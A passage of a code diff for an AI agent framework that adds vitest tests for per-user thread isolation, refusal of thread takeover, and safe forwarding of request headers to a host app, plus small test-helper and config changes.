+    expect(await env.count("vendo_threads", "subject = $1", [BOB])).toBe(0);
+  });
+
+  it("returns ALL of a subject's threads past the store's page cap, most-recently-updated first (M4)", async () => {
+    env = await createEnv();
+    const CARL = "user_carl";
+    const principal = userCtx(CARL).principal;
+    const store = threadStore(env.store);
+
+    // One OLD-created thread, then 120 newer ones (past the 100-row page cap). The
+    // old one is created FIRST, so it sorts last by created_at — on page 2+.
+    await store.put(principal, { id: "thr_oldest", messages: [{ role: "user", parts: [{ type: "text", text: "oldest" }] }] });
+    await new Promise<void>((r) => setTimeout(r, 3));
+    for (let i = 0; i < 120; i += 1) {
+      await store.put(principal, {
+        id: `thr_${String(i).padStart(3, "0")}`,
+        messages: [{ role: "user", parts: [{ type: "text", text: `filler ${i}` }] }],
+      });
+    }
+    // Now TOUCH the oldest thread so it becomes the most recently UPDATED — the
+    // exact "old-created, recently-active" thread the cursor-truncation bug hid.
+    await new Promise<void>((r) => setTimeout(r, 3));
+    await store.put(principal, { id: "thr_oldest", messages: [{ role: "user", parts: [{ type: "text", text: "touched" }] }] });
+
+    const summaries = await env.agentFor(new SpyRegistry([]), scriptedModel([]))
+      .threads.list(userCtx(CARL));
+
+    // All 121 threads come back (nothing truncated at the page boundary)...
+    expect(summaries).toHaveLength(121);
+    // ...and the recently-touched old thread is first (list re-sorts by updatedAt).
+    expect(summaries[0]!.id).toBe("thr_oldest");
+    expect(new Set(summaries.map((s) => s.id)).size).toBe(121);
   });
 });

--- a/fixtures/chat-e2e/src/thread-scoping.e2e.test.ts
+++ b/fixtures/chat-e2e/src/thread-scoping.e2e.test.ts
@@ -1,0 +1,103 @@
+/** Scenario 7 — THREAD PERSISTENCE + SCOPING through the real store.
+ *
+ * A turn persists exactly one vendo_threads row for the subject (03 §5, 02 §2).
+ * Subject B cannot get, list, or delete subject A's thread, and SQL confirms
+ * the row's subject column. This is the integration that only works once the
+ * agent keys reserved vendo_threads rows by the bare thread id and enforces
+ * subject scoping on read/delete (the bug this wave fixed in @vendoai/agent).
+ */
+import { afterEach, describe, expect, it } from "vitest";
+import {
+  createEnv,
+  descriptor,
+  readSse,
+  scriptedModel,
+  SpyRegistry,
+  textTurn,
+  userCtx,
+  userMessage,
+  type Env,
+} from "./harness.js";
+
+const ADA = "user_ada";
+const BOB = "user_bob";
+const THREAD = "thr_scoped";
+
+let env: Env;
+afterEach(async () => {
+  await env?.close();
+});
+
+describe("scenario 7: thread persistence + subject scoping", () => {
+  it("persists one row for the subject and never lets another subject read or delete it", async () => {
+    env = await createEnv();
+    const registry = new SpyRegistry([descriptor({ name: "host_noop", risk: "read" })]);
+
+    // Ada runs a turn; it persists exactly one vendo_threads row.
+    const agentAda = env.agentFor(registry, scriptedModel([textTurn("Hello Ada.", "t1")]));
+    const ctxAda = userCtx(ADA);
+    await readSse(
+      await agentAda.stream({ threadId: THREAD, message: userMessage("u1", "Hi"), ctx: ctxAda }),
+    );
+
+    const rows = await env.sql<{ id: string; subject: string }>(
+      "SELECT id, subject FROM vendo_threads",
+    );
+    expect(rows).toEqual([{ id: THREAD, subject: ADA }]);
+    const stored = await agentAda.threads.get(THREAD, ctxAda);
+    expect(stored).toMatchObject({ id: THREAD, subject: ADA });
+    expect(await agentAda.threads.list(ctxAda)).toHaveLength(1);
+
+    // Bob — a separate subject, separate agent instance over the same store —
+    // cannot get, list, or delete Ada's thread.
+    const agentBob = env.agentFor(registry, scriptedModel([textTurn("unused", "t2")]));
+    const ctxBob = userCtx(BOB);
+    expect(await agentBob.threads.get(THREAD, ctxBob)).toBeNull();
+    expect(await agentBob.threads.list(ctxBob)).toEqual([]);
+
+    await agentBob.threads.delete(THREAD, ctxBob); // no-op: not Bob's thread
+    // Ada's thread survives untouched; the row (and its subject) is unchanged.
+    expect(await agentAda.threads.get(THREAD, ctxAda)).toMatchObject({ id: THREAD, subject: ADA });
+    const after = await env.sql<{ id: string; subject: string }>(
+      "SELECT id, subject FROM vendo_threads",
+    );
+    expect(after).toEqual([{ id: THREAD, subject: ADA }]);
+  });
+
+  it("refuses a foreign subject streaming to an existing thread id — conflict, row intact (no takeover)", async () => {
+    env = await createEnv();
+    const registry = new SpyRegistry([descriptor({ name: "host_noop", risk: "read" })]);
+    const THR = "thr_takeover_target";
+
+    // Ada owns thr_takeover_target on disk.
+    const agentAda = env.agentFor(registry, scriptedModel([textTurn("Ada's turn.", "t1")]));
+    const ctxAda = userCtx(ADA);
+    await readSse(
+      await agentAda.stream({ threadId: THR, message: userMessage("u1", "Ada's message"), ctx: ctxAda }),
+    );
+    const before = await env.sql<{ id: string; subject: string; messages: unknown }>(
+      "SELECT id, subject, messages FROM vendo_threads WHERE id = $1",
+      [THR],
+    );
+    expect(before).toHaveLength(1);
+    expect(before[0]).toMatchObject({ id: THR, subject: ADA });
+
+    // Bob streaming to the SAME id must be refused before any turn runs —
+    // without this, the turn's persist() would upsert the bare-id row and
+    // overwrite Ada's subject + messages (03 §5).
+    const agentBob = env.agentFor(registry, scriptedModel([textTurn("Bob's turn.", "t2")]));
+    await expect(
+      agentBob.stream({ threadId: THR, message: userMessage("u2", "Bob's takeover"), ctx: userCtx(BOB) }),
+    ).rejects.toMatchObject({ code: "conflict" });
+
+    // SQL: Ada's row is INTACT — same subject, same messages — and Bob wrote nothing.
+    const after = await env.sql<{ id: string; subject: string; messages: unknown }>(
+      "SELECT id, subject, messages FROM vendo_threads WHERE id = $1",
+      [THR],
+    );
+    expect(after).toEqual(before);
+    expect(JSON.stringify(after[0]!.messages)).not.toContain("Bob's takeover");
+    expect(await env.count("vendo_threads", "subject = $1", [BOB])).toBe(0);
+    expect(await env.count("vendo_threads")).toBe(1);
+  });
+});

--- a/fixtures/chat-e2e/tsconfig.json
+++ b/fixtures/chat-e2e/tsconfig.json
@@ -1,0 +1,10 @@
+{
+  "extends": "../../tsconfig.base.json",
+  "compilerOptions": {
+    "module": "NodeNext",
+    "moduleResolution": "NodeNext",
+    "lib": ["ES2022"],
+    "noEmit": true
+  },
+  "include": ["src"]
+}

--- a/fixtures/chat-e2e/vitest.config.ts
+++ b/fixtures/chat-e2e/vitest.config.ts
@@ -1,0 +1,12 @@
+import { defineConfig } from "vitest/config";
+
+export default defineConfig({
+  test: {
+    include: ["src/**/*.e2e.test.ts", "src/**/*.test.ts"],
+    // Each test builds its own PGlite store in a fresh mkdtemp dir — no shared
+    // server, no fixed ports — so files are safe to run in parallel. Give the
+    // first PGlite WASM init and the multi-turn scripted runs room.
+    testTimeout: 60_000,
+    hookTimeout: 60_000,
+  },
+});

--- a/fixtures/host-app/next-env.d.ts
+++ b/fixtures/host-app/next-env.d.ts
@@ -1,7 +1,7 @@
 /// <reference types="next" />
 /// <reference types="next/image-types/global" />
 /// <reference types="next/navigation-types/compat/navigation" />
-import "./.next/dev/types/routes.d.ts";
+import "./.next/automations-e2e/dev/types/routes.d.ts";
 
 // NOTE: This file should not be edited
 // see https://nextjs.org/docs/app/api-reference/config/typescript for more information.

--- a/fixtures/host-app/next-env.d.ts
+++ b/fixtures/host-app/next-env.d.ts
@@ -1,7 +1,7 @@
 /// <reference types="next" />
 /// <reference types="next/image-types/global" />
 /// <reference types="next/navigation-types/compat/navigation" />
-import "./.next/automations-e2e/dev/types/routes.d.ts";
+import "./.next/dev/types/routes.d.ts";
 
 // NOTE: This file should not be edited
 // see https://nextjs.org/docs/app/api-reference/config/typescript for more information.

--- a/fixtures/host-app/src/app/fixture/echo/route.ts
+++ b/fixtures/host-app/src/app/fixture/echo/route.ts
@@ -1,0 +1,24 @@
+// Test-only header mirror. Lives under /fixture (not /api) so the route scanner
+// never emits it as a tool — it exists purely so e2e can assert which headers
+// actually arrived on the outbound request (present forwarding vs away actAs).
+
+function reflect(req: Request): Response {
+  const headers: Record<string, string> = {};
+  req.headers.forEach((value, name) => {
+    headers[name] = value;
+  });
+  const url = new URL(req.url);
+  return Response.json({
+    method: req.method,
+    headers,
+    query: Object.fromEntries(url.searchParams.entries()),
+  });
+}
+
+export function GET(req: Request): Response {
+  return reflect(req);
+}
+
+export function POST(req: Request): Response {
+  return reflect(req);
+}

--- a/packages/actions/src/runtime/fixture.e2e.test.ts
+++ b/packages/actions/src/runtime/fixture.e2e.test.ts
@@ -1,5 +1,5 @@
 import { spawn, type ChildProcessWithoutNullStreams } from "node:child_process";
-import { access, mkdir, mkdtemp, rm, writeFile } from "node:fs/promises";
+import { access, mkdir, mkdtemp, readFile, rm, writeFile } from "node:fs/promises";
 import { createServer } from "node:net";
 import { fileURLToPath } from "node:url";
 import { join } from "node:path";
@@ -278,6 +278,95 @@ describe("fixture route execution", () => {
       status: "error",
       error: { code: "validation", message: "away execution requires a captured grant" },
     });
+  });
+
+  it("keeps extraction-disabled routes out of the runtime surface (fail-closed)", async () => {
+    // Real extraction over the real host tree: /api/export-data cannot be classified,
+    // so sync emits it disabled with a note (04 §1). The runtime must never list or
+    // execute it — a route the scanner can't classify is never silently auto-allowed.
+    const root = await mkdtemp(join(tmpdir(), "vendo-actions-failclosed-"));
+    const out = join(root, ".vendo");
+    try {
+      await vendoSync({ root: fixtureDir, out });
+      const written = JSON.parse(await readFile(join(out, "tools.json"), "utf8")) as {
+        tools: Array<{ name: string; disabled?: boolean; note?: string }>;
+      };
+      const unclassified = written.tools.find((tool) => tool.name === "host_export_data_unclassified");
+      expect(unclassified).toMatchObject({ disabled: true });
+      expect(unclassified?.note).toContain("enable only after review");
+
+      const cookie = await loginCookie();
+      const ctx: RunContext = { ...presentBase, requestHeaders: { cookie } };
+      const actions = createActions({ dir: root, baseUrl });
+      const names = (await actions.descriptors()).map((descriptor) => descriptor.name);
+      expect(names).not.toContain("host_export_data_unclassified");
+      // An enabled sibling from the very same extraction is present and runs.
+      expect(names).toContain("host_listInvoices");
+
+      await expect(
+        actions.execute({ id: "fc-1", tool: "host_export_data_unclassified", args: {} }, ctx),
+      ).resolves.toMatchObject({ status: "error", error: { code: "not-found" } });
+      await expect(
+        actions.execute({ id: "fc-2", tool: "host_listInvoices", args: {} }, ctx),
+      ).resolves.toMatchObject({ status: "ok", output: { invoices: expect.any(Array) } });
+    } finally {
+      await rm(root, { recursive: true, force: true });
+    }
+  });
+
+  it("forwards present request headers to the real host and never in away mode", async () => {
+    const echoTool: ExtractedTool = {
+      name: "host_echo",
+      description: "Echo request headers",
+      inputSchema: { type: "object" },
+      risk: "read",
+      binding: { kind: "route", method: "GET", path: "/fixture/echo", argsIn: "query" },
+    };
+
+    // Present: ctx.requestHeaders (cookie/authorization + a custom header) reach the host.
+    const present: RunContext = {
+      ...presentBase,
+      requestHeaders: { cookie: "fixture_session=user_ada", authorization: "Bearer inbound", "x-present": "forwarded" },
+    };
+    const presentActions = createActions({ tools: [echoTool], baseUrl });
+    const presentEcho = okOutput(
+      await presentActions.execute({ id: "e1", tool: "host_echo", args: { q: "1" } }, present),
+    ) as { headers: Record<string, string>; query: Record<string, string> };
+    expect(presentEcho.headers.cookie).toBe("fixture_session=user_ada");
+    expect(presentEcho.headers.authorization).toBe("Bearer inbound");
+    expect(presentEcho.headers["x-present"]).toBe("forwarded");
+    expect(presentEcho.query).toEqual({ q: "1" });
+
+    // Away: only the host's actAs AuthMaterial.headers ride the request. The inbound
+    // present material must NOT leak onto an away call.
+    const grant: PermissionGrant = {
+      id: "grt_echo",
+      subject: "user_ada",
+      tool: "host_echo",
+      descriptorHash: "sha256:echo",
+      scope: { kind: "tool" },
+      duration: "standing",
+      source: "chat",
+      grantedAt: "2026-07-11T00:00:00.000Z",
+    };
+    const away: ActionsRunContext = {
+      ...presentBase,
+      presence: "away",
+      grant,
+      requestHeaders: { cookie: "fixture_session=POISON", authorization: "Bearer present-leak", "x-present": "leak" },
+    };
+    const awayActions = createActions({
+      tools: [echoTool],
+      baseUrl,
+      actAs: async () => ({ headers: { authorization: "Bearer away-token", "x-actas": "yes" } }),
+    });
+    const awayEcho = okOutput(
+      await awayActions.execute({ id: "e2", tool: "host_echo", args: {} }, away),
+    ) as { headers: Record<string, string> };
+    expect(awayEcho.headers.authorization).toBe("Bearer away-token");
+    expect(awayEcho.headers["x-actas"]).toBe("yes");
+    expect(awayEcho.headers["x-present"]).toBeUndefined();
+    expect(awayEcho.headers.cookie).toBeUndefined();
   });
 
   it("executes OpenAPI bindings using the body-key convention", async () => {

--- a/packages/actions/src/runtime/registry.test.ts
+++ b/packages/actions/src/runtime/registry.test.ts
@@ -7,6 +7,7 @@ import { afterEach, describe, expect, it, vi } from "vitest";
 import {
   VENDO_OVERRIDES_FORMAT,
   VENDO_TOOLS_FORMAT,
+  descriptorHash,
   toolOutcomeSchema,
   type RunContext,
   type ToolDescriptor,
@@ -173,6 +174,31 @@ describe("createActions registry", () => {
       status: "error",
       error: { code: "connector-error", message: "provider down" },
     });
+  });
+
+  it("exposes a descriptorHash computed post-merge so an override lapses old grants", async () => {
+    // 04 §1 merge rule: descriptorHash is computed over the MERGED descriptor.
+    // An overrides.json risk bump must change the hash the runtime exposes, which is
+    // exactly the drift that lapses a grant bound to the pre-override descriptor.
+    const base = routeTool("host_invoices_delete", { risk: "write" });
+    const root = await tempVendo(
+      { format: VENDO_TOOLS_FORMAT, tools: [base] },
+      { format: VENDO_OVERRIDES_FORMAT, tools: { host_invoices_delete: { risk: "destructive", critical: true } } },
+    );
+    const actions = createActions({ dir: root, baseUrl: "http://stub" });
+    const [descriptor] = await actions.descriptors();
+    expect(descriptor).toMatchObject({ name: "host_invoices_delete", risk: "destructive", critical: true });
+
+    const merged: ToolDescriptor = {
+      name: "host_invoices_delete",
+      description: "host_invoices_delete",
+      inputSchema: { type: "object" },
+      risk: "destructive",
+      critical: true,
+    };
+    const preMerge: ToolDescriptor = { name: "host_invoices_delete", description: "host_invoices_delete", inputSchema: { type: "object" }, risk: "write" };
+    expect(descriptorHash(descriptor!)).toBe(descriptorHash(merged));
+    expect(descriptorHash(descriptor!)).not.toBe(descriptorHash(preMerge));
   });
 
   it("supports add after the first lazy load without re-describing cached sources", async () => {

--- a/packages/agent/src/stream-client.test.ts
+++ b/packages/agent/src/stream-client.test.ts
@@ -11,11 +11,13 @@ import {
   boundRegistry,
   ctx,
   memoryStore,
+  partOfType,
   readSse,
   scriptedModel,
   testGuard,
   textTurn,
   toolCallTurn,
+  userMessage,
 } from "./test-helpers.js";
 
 // 03-agent §4: "an ai-SDK UI message stream Response (SSE), consumable by
@@ -36,16 +38,6 @@ async function assembleClientMessage(response: Response): Promise<UIMessage> {
   }
   if (last === undefined) throw new Error("client reducer produced no message");
   return last;
-}
-
-const userMessage = (id: string, text: string): UIMessage => ({
-  id,
-  role: "user",
-  parts: [{ type: "text", text }],
-});
-
-function partOfType(message: UIMessage, type: string): Record<string, unknown> | undefined {
-  return message.parts.find((part) => part.type === type) as Record<string, unknown> | undefined;
 }
 
 function dynamicTool(message: UIMessage, toolCallId: string): Record<string, unknown> | undefined {

--- a/packages/agent/src/stream-client.test.ts
+++ b/packages/agent/src/stream-client.test.ts
@@ -1,0 +1,173 @@
+import {
+  vendoApprovalPartSchema,
+  vendoViewPartSchema,
+  type ToolDescriptor,
+} from "@vendoai/core";
+import { readUIMessageStream, type UIMessage, type UIMessageChunk } from "ai";
+import { simulateReadableStream } from "ai/test";
+import { describe, expect, it } from "vitest";
+import { createAgent } from "./index.js";
+import {
+  boundRegistry,
+  ctx,
+  memoryStore,
+  readSse,
+  scriptedModel,
+  testGuard,
+  textTurn,
+  toolCallTurn,
+} from "./test-helpers.js";
+
+// 03-agent §4: "an ai-SDK UI message stream Response (SSE), consumable by
+// ai-SDK clients (ui's useVendoThread rides this)". The other suites parse the
+// SSE frames by hand; this one feeds the agent's ACTUAL Response bytes back
+// through the SDK's own client reducer (readUIMessageStream) — the exact code
+// path ui's hooks use — and asserts the assembled UIMessage. That is the E2E
+// proof the wire is genuinely client-consumable, and that the Vendo data parts
+// (core §16) survive the official reducer intact rather than only surviving a
+// bespoke parser.
+async function assembleClientMessage(response: Response): Promise<UIMessage> {
+  const { parts } = await readSse(response);
+  let last: UIMessage | undefined;
+  for await (const message of readUIMessageStream({
+    stream: simulateReadableStream({ chunks: parts as UIMessageChunk[] }),
+  })) {
+    last = message;
+  }
+  if (last === undefined) throw new Error("client reducer produced no message");
+  return last;
+}
+
+const userMessage = (id: string, text: string): UIMessage => ({
+  id,
+  role: "user",
+  parts: [{ type: "text", text }],
+});
+
+function partOfType(message: UIMessage, type: string): Record<string, unknown> | undefined {
+  return message.parts.find((part) => part.type === type) as Record<string, unknown> | undefined;
+}
+
+function dynamicTool(message: UIMessage, toolCallId: string): Record<string, unknown> | undefined {
+  return message.parts.find(
+    (part) => part.type === "dynamic-tool" && (part as { toolCallId?: string }).toolCallId === toolCallId,
+  ) as Record<string, unknown> | undefined;
+}
+
+describe("agent stream consumed by an ai-SDK client", () => {
+  it("assembles a tool round trip and a Vendo view part into a client UIMessage and persists the turn", async () => {
+    const view = {
+      appId: "app_1",
+      payload: {
+        formatVersion: "vendo-genui/v1",
+        root: "r",
+        nodes: [{ id: "r", component: "Text", props: { text: "Ready" } }],
+      },
+    };
+    const descriptor: ToolDescriptor = {
+      name: "render_result",
+      description: "Return a rendered app surface.",
+      inputSchema: { type: "object", additionalProperties: false },
+      risk: "read",
+    };
+    const model = scriptedModel([
+      toolCallTurn("render_result", {}, "call_view"),
+      textTurn("Rendered.", "text_view_done"),
+    ]);
+    const guard = testGuard({ render_result: "run" });
+    const tools = boundRegistry({ render_result: { descriptor, execute: async () => view } }, guard);
+    const store = memoryStore();
+    const agent = createAgent({ model, tools, guard, store });
+    const runCtx = ctx();
+
+    const response = await agent.stream({
+      threadId: "thr_client_view",
+      message: userMessage("user_client_view", "Show the result"),
+      ctx: runCtx,
+    });
+    const message = await assembleClientMessage(response);
+
+    // The SDK reducer produces one assistant message with the tool resolved,
+    // the Vendo view data part preserved, and the final text.
+    expect(message.role).toBe("assistant");
+
+    const toolPart = dynamicTool(message, "call_view");
+    expect(toolPart).toMatchObject({
+      type: "dynamic-tool",
+      toolName: "render_result",
+      state: "output-available",
+      output: { status: "ok", output: view },
+    });
+
+    const viewPart = partOfType(message, "data-vendo-view");
+    expect(viewPart).toEqual({ type: "data-vendo-view", ...view });
+    expect(vendoViewPartSchema.safeParse(viewPart).success).toBe(true);
+
+    const textPart = message.parts.find(
+      (part) => part.type === "text" && (part as { text?: string }).text === "Rendered.",
+    );
+    expect(textPart).toBeDefined();
+
+    // Real StoreAdapter side effect: the completed turn is persisted as one
+    // vendo_threads row for this subject, carrying the assembled assistant
+    // message the client just read.
+    const rows = await store.records("vendo_threads").list({ refs: { subject: "u1" } });
+    expect(rows.records).toHaveLength(1);
+    const persisted = rows.records[0]!.data as { subject: string; messages: UIMessage[] };
+    expect(persisted.subject).toBe("u1");
+    expect(persisted.messages.some((entry) => entry.id === message.id && entry.role === "assistant")).toBe(true);
+    expect(persisted.messages.some((entry) => entry.id === "user_client_view")).toBe(true);
+  });
+
+  it("surfaces the native approval request and the Vendo approval part to an ai-SDK client on pause", async () => {
+    const descriptor: ToolDescriptor = {
+      name: "send_echo",
+      description: "Send an echo through a write path.",
+      inputSchema: {
+        type: "object",
+        properties: { value: { type: "string" } },
+        required: ["value"],
+        additionalProperties: false,
+      },
+      risk: "write",
+    };
+    // A single scripted turn: the model calls the asked tool, the guard parks,
+    // the turn pauses. No second turn is scripted — the client sees the pause.
+    const model = scriptedModel([toolCallTurn("send_echo", { value: "hi" }, "call_ap")]);
+    const guard = testGuard({ send_echo: "ask" });
+    const tools = boundRegistry(
+      { send_echo: { descriptor, execute: async () => ({ echoed: "hi" }) } },
+      guard,
+    );
+    const agent = createAgent({ model, tools, guard });
+
+    const response = await agent.stream({
+      threadId: "thr_client_approval",
+      message: userMessage("user_client_approval", "Send the echo"),
+      ctx: ctx(),
+    });
+    const message = await assembleClientMessage(response);
+
+    // The client reducer resolves the tool part to the SDK's native
+    // approval-requested state (its own approval id, used for
+    // addToolApprovalResponse) ...
+    const toolPart = dynamicTool(message, "call_ap");
+    expect(toolPart).toMatchObject({ type: "dynamic-tool", toolName: "send_echo", state: "approval-requested" });
+    expect(typeof (toolPart?.approval as { id?: unknown } | undefined)?.id).toBe("string");
+
+    // ... alongside the Vendo approval data part carrying the CORE approvalId
+    // (used for guard.approvals.decide). Two ids, two flows, both on the wire.
+    const approvalPart = partOfType(message, "data-vendo-approval");
+    expect(approvalPart).toEqual({
+      type: "data-vendo-approval",
+      toolCallId: "call_ap",
+      risk: "write",
+      approvalId: "apr_call_ap",
+    });
+    expect(vendoApprovalPartSchema.safeParse(approvalPart).success).toBe(true);
+
+    // The tool did not execute; the approval remains queued for the user.
+    expect(tools.invocations.send_echo).toBe(0);
+    expect(guard.pending()).toHaveLength(1);
+  });
+});

--- a/packages/agent/src/test-helpers.ts
+++ b/packages/agent/src/test-helpers.ts
@@ -11,6 +11,7 @@ import type {
   ToolOutcome,
   ToolRegistry,
 } from "@vendoai/core";
+import type { UIMessage } from "ai";
 import { MockLanguageModelV3, simulateReadableStream } from "ai/test";
 import { expect } from "vitest";
 
@@ -262,4 +263,14 @@ export function ctx(overrides: Partial<RunContext> = {}): RunContext {
     sessionId: "s1",
     ...overrides,
   };
+}
+
+/** A minimal single-text-part user UIMessage — the shape every suite feeds stream(). */
+export function userMessage(id: string, text: string): UIMessage {
+  return { id, role: "user", parts: [{ type: "text", text }] };
+}
+
+/** The first assembled UIMessage part of a given type (e.g. "data-vendo-view"). */
+export function partOfType(message: UIMessage, type: string): Record<string, unknown> | undefined {
+  return message.parts.find((part) => part.type === type) as Record<string, unknown> | undefined;
 }

--- a/packages/agent/src/threads.test.ts
+++ b/packages/agent/src/threads.test.ts
@@ -9,13 +9,8 @@ import {
   scriptedModel,
   testGuard,
   textTurn,
+  userMessage,
 } from "./test-helpers.js";
-
-const userMessage = (id: string, text: string): UIMessage => ({
-  id,
-  role: "user",
-  parts: [{ type: "text", text }],
-});
 
 function assistantText(messages: UIMessage[]): string {
   return messages
@@ -204,5 +199,82 @@ describe("agent threads", () => {
     expect(await agent.threads.list(ephemeralCtx)).toEqual([
       expect.objectContaining({ id: threadId, title: "Temporary question" }),
     ]);
+  });
+
+  it("skips a malformed thread row instead of bricking the whole listing (M5)", async () => {
+    const store = memoryStore();
+    const guard = testGuard({});
+    const tools = boundRegistry({}, guard);
+    const agent = createAgent({
+      model: scriptedModel([textTurn("Good reply.", "text_good")]),
+      tools,
+      guard,
+      store,
+    });
+    const runCtx = ctx();
+
+    // A well-formed thread for the subject.
+    await readSse(await agent.stream({
+      threadId: "thr_good",
+      message: userMessage("user_good", "Good question"),
+      ctx: runCtx,
+    }));
+
+    // Junk-MESSAGES row for the SAME subject, written straight through the store
+    // seam: a message with no `parts` and a non-object message. This is a valid
+    // Thread whose messages yield no title — titleFor must TOLERATE it (fall back
+    // to "New thread") rather than throwing and bricking the whole listing.
+    await store.records("vendo_threads").put({
+      id: "thr_junk_msgs",
+      data: { subject: "u1", messages: [{ role: "user" }, "not-a-message"] },
+      refs: { subject: "u1" },
+    });
+    // Truly-unparseable row (messages is not even an array): threadFromRecord must
+    // SKIP it (return null) so it never reaches titleFor.
+    await store.records("vendo_threads").put({
+      id: "thr_unparseable",
+      data: { subject: "u1", messages: "nope" },
+      refs: { subject: "u1" },
+    });
+
+    // No throw; the good thread keeps its title, the junk-messages thread lists
+    // with the fallback title, the unparseable row is dropped.
+    const summaries = await agent.threads.list(runCtx);
+    expect(summaries.map((s) => s.id).sort()).toEqual(["thr_good", "thr_junk_msgs"]);
+    expect(summaries.find((s) => s.id === "thr_good")).toMatchObject({ title: "Good question" });
+    expect(summaries.find((s) => s.id === "thr_junk_msgs")).toMatchObject({ title: "New thread" });
+  });
+
+  it("lets two subjects privately use the same thread id in MEMORY mode (no store)", async () => {
+    // With no store, threads live in per-subject maps: the same id is two distinct
+    // private threads — no conflict, no leak. This pins the intentional divergence
+    // from the store path (where the bare-id row forces cross-subject refusal).
+    const guard = testGuard({});
+    const tools = boundRegistry({}, guard);
+    const agent = createAgent({
+      model: scriptedModel([
+        textTurn("Alice reply.", "text_alice"),
+        textTurn("Bob reply.", "text_bob"),
+      ]),
+      tools,
+      guard,
+      // no store
+    });
+    const alice = ctx({ principal: { kind: "user", subject: "alice" }, sessionId: "sa" });
+    const bob = ctx({ principal: { kind: "user", subject: "bob" }, sessionId: "sb" });
+    const sharedId = "thr_shared_id";
+
+    await readSse(await agent.stream({ threadId: sharedId, message: userMessage("m_a", "Hi from Alice"), ctx: alice }));
+    // Bob reusing the SAME id does NOT conflict and does NOT see Alice's thread.
+    await readSse(await agent.stream({ threadId: sharedId, message: userMessage("m_b", "Hi from Bob"), ctx: bob }));
+
+    const aliceThread = await agent.threads.get(sharedId, alice);
+    const bobThread = await agent.threads.get(sharedId, bob);
+    expect(assistantText(aliceThread!.messages)).toContain("Alice reply.");
+    expect(assistantText(aliceThread!.messages)).not.toContain("Bob reply.");
+    expect(assistantText(bobThread!.messages)).toContain("Bob reply.");
+    expect(assistantText(bobThread!.messages)).not.toContain("Alice reply.");
+    expect(aliceThread!.messages.some((m) => m.id === "m_b")).toBe(false);
+    expect(bobThread!.messages.some((m) => m.id === "m_a")).toBe(false);
   });
 });

--- a/packages/agent/src/threads.test.ts
+++ b/packages/agent/src/threads.test.ts
@@ -76,7 +76,7 @@ describe("agent threads", () => {
     expect(Date.parse(secondThread!.updatedAt)).toBeGreaterThan(Date.parse(firstThread!.updatedAt));
   });
 
-  it("isolates get, list, delete, and colliding stream ids by principal subject", async () => {
+  it("isolates get, list, and delete by principal subject — one subject never reads or deletes another's thread", async () => {
     const store = memoryStore();
     const guard = testGuard({});
     const tools = boundRegistry({}, guard);
@@ -94,36 +94,82 @@ describe("agent threads", () => {
       principal: { kind: "user", subject: "u2" },
       sessionId: "s2",
     });
-    const threadId = "thr_private";
+    // Reserved vendo_threads rows are keyed by the bare thread id (02 §2 — `id`
+    // is the primary key), so each thread is one row; subjects own distinct
+    // ids. Isolation (03 §5) is enforced by subject checks on read/delete.
+    const u1ThreadId = "thr_private_u1";
+    const u2ThreadId = "thr_private_u2";
 
-    const response = await agent.stream({
-      threadId,
+    await readSse(await agent.stream({
+      threadId: u1ThreadId,
       message: userMessage("user_private", "Private question"),
       ctx: u1,
-    });
-    await readSse(response);
+    }));
 
-    expect(await agent.threads.get(threadId, u2)).toBeNull();
+    // u2 cannot see u1's thread by id or in its own listing.
+    expect(await agent.threads.get(u1ThreadId, u2)).toBeNull();
     expect(await agent.threads.list(u2)).toEqual([]);
 
-    const u1Before = await agent.threads.get(threadId, u1);
-    const foreignResponse = await agent.stream({
-      threadId,
+    const u1Before = await agent.threads.get(u1ThreadId, u1);
+    await readSse(await agent.stream({
+      threadId: u2ThreadId,
       message: userMessage("user_independent", "Independent question"),
       ctx: u2,
-    });
-    await readSse(foreignResponse);
+    }));
 
-    const u1After = await agent.threads.get(threadId, u1);
-    const u2Thread = await agent.threads.get(threadId, u2);
-    expect(u1After).toEqual(u1Before);
-    expect(u2Thread).toMatchObject({ id: threadId, subject: "u2" });
+    // u2's own thread is independent; u1's is untouched and still private to u1.
+    const u2Thread = await agent.threads.get(u2ThreadId, u2);
+    expect(u2Thread).toMatchObject({ id: u2ThreadId, subject: "u2" });
     expect(assistantText(u2Thread!.messages)).toContain("Independent reply.");
+    expect(await agent.threads.get(u2ThreadId, u1)).toBeNull();
+    expect(await agent.threads.get(u1ThreadId, u1)).toEqual(u1Before);
+    expect(await agent.threads.list(u1)).toHaveLength(1);
     expect(await agent.threads.list(u2)).toHaveLength(1);
 
-    await agent.threads.delete(threadId, u2);
-    expect(await agent.threads.get(threadId, u1)).not.toBeNull();
+    // A foreign-subject delete is a no-op: u2 cannot delete u1's thread.
+    await agent.threads.delete(u1ThreadId, u2);
+    expect(await agent.threads.get(u1ThreadId, u1)).not.toBeNull();
     expect(await agent.threads.list(u1)).toHaveLength(1);
+  });
+
+  it("refuses to reuse another subject's persisted thread id (conflict, no takeover)", async () => {
+    const store = memoryStore();
+    const guard = testGuard({});
+    const tools = boundRegistry({}, guard);
+    const agent = createAgent({
+      model: scriptedModel([textTurn("Owned reply.", "text_owned")]),
+      tools,
+      guard,
+      store,
+    });
+    const u1 = ctx();
+    const u2 = ctx({
+      principal: { kind: "user", subject: "u2" },
+      sessionId: "s2",
+    });
+    const threadId = "thr_owned_by_u1";
+
+    await readSse(await agent.stream({
+      threadId,
+      message: userMessage("user_owned", "Mine"),
+      ctx: u1,
+    }));
+
+    // u2 streaming to u1's id must be refused outright: get() reads the
+    // foreign row as null, but silently reusing the id would let persist()'s
+    // bare-id upsert take over u1's row (03 §5).
+    await expect(agent.stream({
+      threadId,
+      message: userMessage("user_takeover", "Take over"),
+      ctx: u2,
+    })).rejects.toMatchObject({ code: "conflict" });
+
+    // u1's thread is intact — same subject, same messages — and u2 owns nothing.
+    const intact = await agent.threads.get(threadId, u1);
+    expect(intact).toMatchObject({ id: threadId, subject: "u1" });
+    expect(intact!.messages.some((message) => message.id === "user_owned")).toBe(true);
+    expect(intact!.messages.some((message) => message.id === "user_takeover")).toBe(false);
+    expect(await agent.threads.list(u2)).toEqual([]);
   });
 
   it("keeps ephemeral principal threads in session memory even when a store is configured", async () => {

--- a/packages/agent/src/threads.ts
+++ b/packages/agent/src/threads.ts
@@ -1,4 +1,4 @@
-import { VendoError, type IsoDateTime, type RunContext, type StoreAdapter, type ThreadId } from "@vendoai/core";
+import { VendoError, type IsoDateTime, type RunContext, type StoreAdapter, type ThreadId, type VendoRecord } from "@vendoai/core";
 import type { UIMessage } from "ai";
 import { mintThreadId } from "./ids.js";
 
@@ -21,15 +21,24 @@ export interface ThreadSummary {
   updatedAt: IsoDateTime;
